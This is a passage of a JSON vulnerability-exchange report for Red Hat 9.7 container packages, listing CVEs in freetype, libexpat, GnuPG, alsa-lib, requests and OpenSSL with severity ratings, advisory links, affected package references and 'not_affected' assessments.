"ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-23865", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "bitnami" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 4.6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125 ], "description": "An integer overflow in the tt_var_load_item_variation_store function of the Freetype library in versions 2.13.2 and 2.13.3 may allow for an out of bounds read operation when parsing HVAR/VVAR/MVAR tables in OpenType variable fonts. This issue is fixed in version 2.14.2.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-23865" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/03/8" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9693" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-23865" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460038" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460039" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460040" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460041" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460042" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460043" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460044" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22007" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22013" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22016" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22018" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22021" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23865" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34268" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34282" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:9689" }, { "url": "https://github.com/advisories/GHSA-878v-mxg6-vj8f" }, { "url": "https://gitlab.com/freetype/freetype/-/commit/fc85a255849229c024c8e65f536fe1875d84841c" }, { "url": "https://linux.oracle.com/cve/CVE-2026-23865.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23865" }, { "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2" }, { "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2/" }, { "url": "https://ubuntu.com/security/notices/USN-8086-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-23865" }, { "url": "https://www.facebook.com/security/advisories/cve-2026-23865" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA" } ], "published": "2026-03-02T17:16:32+00:00", "updated": "2026-05-01T17:41:13+00:00", "affects": [ { "ref": "pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.10.4-10.el9_5", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-24515", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 2.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "photon" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 2.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 476 ], "description": "In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-24515" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-24515" }, { "url": "https://github.com/libexpat/libexpat/pull/1131" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515" }, { "url": "https://ubuntu.com/security/notices/USN-8022-1" }, { "url": "https://ubuntu.com/security/notices/USN-8022-2" }, { "url": "https://ubuntu.com/security/notices/USN-8023-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-24515" } ], "published": "2026-01-23T08:16:01+00:00", "updated": "2026-02-05T17:27:53+00:00", "affects": [ { "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.5.0-5.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-24883", "ratings": [ { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 476 ], "description": "In GnuPG before 2.5.17, a long signature packet length causes parse_signature to return success with sig->data[] set to a NULL value, leading to a denial of service (application crash).", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-24883" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-24883" }, { "url": "https://dev.gnupg.org/T8049" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24883" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-24883" }, { "url": "https://www.openwall.com/lists/oss-security/2026/01/27/8" } ], "published": "2026-01-27T19:16:16+00:00", "updated": "2026-02-06T18:06:07+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.3.3-5.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-25068", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 4.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 129 ], "description": "alsa-lib versions 1.2.2 up to and including 1.2.15.2, prior to commit 5f7fe33, contain a heap-based buffer overflow in the topology mixer control decoder. The tplg_decode_control_mixer1() function reads the num_channels field from untrusted .tplg data and uses it as a loop bound without validating it against the fixed-size channel array (SND_TPLG_MAX_CHAN). A crafted topology file with an excessive num_channels value can cause out-of-bounds heap writes, leading to a crash.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-25068" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-25068" }, { "url": "https://github.com/alsa-project/alsa-lib/commit/5f7fe33002d2d98d84f72e381ec2cccc0d5d3d40" }, { "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00008.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25068" }, { "url": "https://ubuntu.com/security/notices/USN-8044-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-25068" }, { "url": "https://www.vulncheck.com/advisories/alsa-lib-topology-decoder-heap-based-buffer-overflow" } ], "published": "2026-01-29T20:16:10+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.2.14-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/alsa-lib@1.2.14-1.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-25645", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "ghsa" }, "score": 4.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], "cwes": [ 377 ], "description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.", "recommendation": "; Upgrade requests to version 2.33.0", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-25645" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-25645" }, { "url": "https://github.com/psf/requests" }, { "url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7" }, { "url": "https://github.com/psf/requests/releases/tag/v2.33.0" }, { "url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-25645" } ], "published": "2026-03-25T17:16:52+00:00", "updated": "2026-03-30T14:23:16+00:00", "affects": [ { "ref": "pkg:pypi/requests@2.32.5", "versions": [ { "version": "2.32.5", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:pypi/requests@2.32.5" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n linux-vdso.so.1 (0x0000ffff8cd00000)\n libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)" } }, { "id": "CVE-2026-2673", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "julia" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "redhat" }, "score": 4.2, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 757 ], "description": "Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected\npreferred key exchange group when its key exchange group configuration includes\nthe default by using the 'DEFAULT' keyword.\n\nImpact summary: A less preferred key exchange may be used even when a more\npreferred group is supported by both client and server, if the group\nwas not included among the client's initial predicated keyshares.\nThis will sometimes be the case with the new hybrid post-quantum groups,\nif the client chooses to defer their use until specifically requested by\nthe server.\n\nIf an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to\ninterpolate the built-in default group list into its own configuration, perhaps\nadding or removing specific elements, then an implementation defect causes the\n'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups\nwere treated as a single sufficiently secure 'tuple', with the server not\nsending a Hello Retry Request (HRR) even when a group in a more preferred tuple\nwas mutually supported.\n\nAs a result, the client and server might fail to negotiate a mutually supported\npost-quantum key agreement group, such as 'X25519MLKEM768', if the client's\nconfiguration results in only 'classical' groups (such as 'X25519' being the\nonly ones in the client's initial keyshare prediction).\n\nOpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS\n1.3 key agreement group on TLS servers. The old syntax had a single 'flat'\nlist of groups, and treated all the supported groups as sufficiently secure.\nIf any of the keyshares predicted by the client were supported by the server\nthe most preferred among these was selected, even if other groups supported by\nthe client, but not included in the list of predicted keyshares would have been\nmore preferred, if included.\n\nThe new syntax partitions the groups into distinct 'tuples' of roughly\nequivalent security. Within each tuple the most preferred group included among\nthe client's predicted keyshares is chosen, but if the client supports a group\nfrom a more preferred tuple, but did not predict any corresponding keyshares,\nthe server will ask the client to retry the ClientHello (by issuing a Hello\nRetry Request or HRR) with the most preferred mutually supported group.\n\nThe above works as expected when the server's configuration uses the built-in\ndefault 